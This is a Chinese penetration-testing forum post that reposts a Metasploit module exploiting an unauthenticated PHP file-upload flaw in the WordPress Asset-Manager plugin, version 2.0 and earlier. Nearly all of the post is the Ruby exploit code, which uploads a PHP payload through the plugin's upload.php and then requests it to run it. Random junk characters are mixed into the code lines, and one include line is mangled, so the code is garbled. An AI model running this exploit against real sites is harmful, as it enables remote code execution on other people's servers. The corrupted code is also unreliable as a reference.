找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1991|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。0 b1 j$ x9 K3 m8 G  s( T# }  n8 k+ a
1 l6 P. Y# A1 s, g* f5 F
##& e6 s- W9 y* F
# This file is part of the Metasploit Framework and may be subject to
, D  w( M" v; o) t8 M0 {# redistribution and commercial restrictions. Please see the Metasploit. ^+ c$ }1 |. C, A( N9 b. X0 B
# Framework web site for more information on licensing and terms of use./ \/ V& H; j, o. A$ V; g
#   http://metasploit.com/framework/
, x  i) `% M2 z4 H. c##
& y. L/ f. Z7 W
, i" m/ e8 P& k) Wrequire 'msf/core'
' c' n3 h2 @1 P* c9 d$ Brequire 'msf/core/exploit/php_exe'
7 B- ?4 N& c1 }, R* M9 ~# y - m7 {' F8 o# ^7 \
class Metasploit3 < Msf::Exploit::Remote" W, p: d) D: o/ Y% L1 K* f
  Rank = ExcellentRanking! h# j0 X  G7 d+ e3 g0 W2 L

% H8 {7 C" t% |8 J! a" ]- w& e  include Msf::Exploit::Remote::HttpClient
* L' T& Q! h. t/ v1 d" S/ z  include Msf::Exploit:hpEXE$ c9 M! t6 j* J" R
, B- p2 Z: t5 H2 o2 U
  def initialize(info = {})
) e7 M( I4 r9 B! L5 P7 R( X    super(update_info(info,
. }/ u  ^  g! z4 q2 a  i9 w      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
( U7 ~1 Z, a4 j0 f, Z      'Description'    => %q{( i4 L, ~) `5 x3 d: d
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress! k) C% A5 d1 s" W2 E1 }. [5 e
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
- ^: B- E' N  i& L( B- Z/ V8 A1 W        temp directory without authentication, which results in arbitrary code execution.. e- T; R3 E4 q9 v4 K* ]* ~
      }," _( h7 j+ c+ f6 g) [3 L1 z  {
      'Author'         =>, Q" e% O$ u# E4 L
        [
. O4 K! b5 ~# _3 t* w          'Sammy FORGIT', # initial discovery9 g0 P+ l8 A/ Z) R- y( d+ ^9 T0 v
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
! E4 F7 s$ U( ^, A% P        ],
* R0 \# U9 d* \! g; W      'License'        => MSF_LICENSE,; m5 L& Q/ A2 _
      'References'     =>0 e8 a2 q  O, x% S
        [
/ L8 i9 V+ \/ d1 _          [ 'OSVDB', '82653' ],' Q6 o5 J4 O4 Q# J! \& y3 t6 ^
          [ 'BID', '53809' ],# }1 V7 y( ]2 Y
          [ 'EDB', '18993' ],1 C6 n1 m1 @. N: A. k5 ^
          [ 'URL', 'http:// www.myhack58.com /' ]
! J% c% v7 i3 x- f( R* l        ],9 v* a4 i! s$ H8 Y0 m- C
      'Payload'       =>' u% q4 _/ {- t' G* R% y, `8 \- V
        {
" X. f$ Q' A- n6 x$ P          'BadChars' => "\x00",
6 v# X' a4 M- I; q        },
, w# H+ D8 r; n) v" N      'Platform'       => 'php',
6 k4 `' O1 q4 N6 v0 x* w$ e5 [      'Arch'           => ARCH_PHP,
. v& G7 {7 ]; e( y5 ]9 m' Z' o- j      'Targets'        =>) d; f1 O7 J4 r8 U  T, [9 T
        [1 `* ?( e+ S- H8 G4 S- e
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
" @% }9 m* L% m$ a' q  i          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]9 M5 X0 D2 J) _! ?5 E( o, W
        ],
6 m* T+ O" O! f1 p1 {' i      'DefaultTarget' => 0,
" w; x# w. F0 Q      'DisclosureDate' => 'May 26 2012'))
5 R" B) V% j+ Q  q" r; x0 o5 A2 ^
" F+ Q7 x7 H4 V* x$ N    register_options(( o) ~" E. |# B& K6 C
      [# K5 p" y) N8 j( d" M# u( S9 \
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
6 f3 j. B: ?! D! h      ], self.class)
8 i/ U, C) @* T0 `  end
; z& l% X1 ^, o3 q
& u) g( H3 p/ o& A  def exploit
5 B+ Q- N  r/ H  G' D, ?5 U    uri =  target_uri.path
8 z+ k$ y7 S* a    uri << '/' if uri[-1,1] != '/'
  H- f; r; b. R# [* N    peer = "#{rhost}:#{rport}"& r" {, t; X) ?/ l( a/ }
    payload_name = "#{rand_text_alpha(5)}.php"
/ M, F. U  x% j" s    php_payload = get_write_exec_payload(:unlink_self=>true)
6 n7 g. m; u" Q$ y 8 u+ o) X2 v" k8 I5 \/ ?
    data = Rex::MIME::Message.new* n% C: l$ n( B/ s; ]
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")8 e; W" d7 a" f/ H& _9 n2 L: r. q
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')0 m2 A" K; l( Z  y0 J7 J6 [

7 Z0 |' z1 R. d) T+ `. P  a    print_status("#{peer} - Uploading payload #{payload_name}")5 ]9 R) @, O% ^( S! A$ @
    res = send_request_cgi({: M" l: w2 q; A2 a
      'method'  => 'POST',
( s& A" D9 [- J% {      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",( O: O7 j+ ~# I6 ]$ N$ x5 W+ S
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
9 X' r5 a. A- J9 h) B      'data'    => post_data
1 H" r7 {0 H- v8 a' A# j    })
; Y, w, @. |2 [9 r3 m2 O' ^% R - t" @! J6 O7 ~
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
4 J0 {  D) p" r8 O4 B      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
3 F* k$ _, n7 H3 }; M  fend; K) t& P: h4 n( i2 U9 l6 X+ c1 ?9 G9 Q
+ u# S  @) H( s( v# g$ r
    print_status("#{peer} - Executing payload #{payload_name}")
9 F# N% U9 A/ \4 Y6 R    res = send_request_raw({
& C$ w$ F: y; a" j# c' {      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: Z- h2 N, B1 _
      'method'  => 'GET'2 a" K* A1 d, G
    }): U7 ~$ B$ N  G2 I

3 W6 e% e, h0 ~$ U9 e    if res and res.code != 200( J4 v2 U4 Z* j2 Y. H
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% Z/ x9 ]0 g) j2 E
    end5 D0 Q) @6 A, h' D- f
  end
& c1 X( f8 o$ Wend. c+ T' P9 D. y* R, ]! I# l
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表